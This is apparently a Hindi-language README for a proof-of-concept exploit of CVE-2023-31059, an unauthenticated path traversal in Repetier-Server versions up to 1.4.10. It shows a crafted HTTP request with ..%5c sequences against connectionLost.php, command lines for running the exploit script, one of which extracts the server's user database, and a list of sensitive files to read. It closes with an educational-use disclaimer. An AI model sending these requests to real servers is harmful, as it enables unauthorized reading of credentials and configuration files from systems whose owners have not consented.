
CVE-2023-31059 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Repetier-Server ≤1.4.10 में एक अनप्रमाणित पाथ ट्रैवर्सल है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमानी फ़ाइल पढ़ने में सक्षम बनाता है।
लेखक: मोहम्मद इदरीस बनयामेर
भूमिका: सुरक्षा शोधकर्ता
देश: जॉर्डन 🇯🇴
Repetier‑Server ≤ 1.4.10 में बिना प्रमाणीकरण वाली रिमोट पाथ ट्रैवर्सल / LFI भेद्यता के लिए प्रूफ‑ऑफ‑कॉन्सेप्ट शोषण।
यह भेद्यता connectionLost.php एंडपॉइंट में विशेष रूप से तैयार किए गए ..%5c अनुक्रमों के माध्यम से मनमानी फ़ाइल पढ़ने की अनुमति देती है।
| फ़ील्ड | मान |
|---|
| उत्पाद | Repetier‑Server |
| प्रभावित | ≤ 1.4.10 |
| CVE | CVE‑2023‑31059 |
| प्रकार | पाथ ट्रैवर्सल / LFI |
| प्रमाणीकरण | कोई नहीं |
| वेक्टर | नेटवर्क |
| प्रभाव | मनमानी फ़ाइल पढ़ना |
| CVSS | 9.8 गंभीर |
flowchart LR
A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Unsanitized file parameter| D[Windows Filesystem]
D --> E[Sensitive File]
E --> B
B -->|File contents in HTTP response| AGET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
pip install requests
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।
GitHub: https://github.com/mbanyamer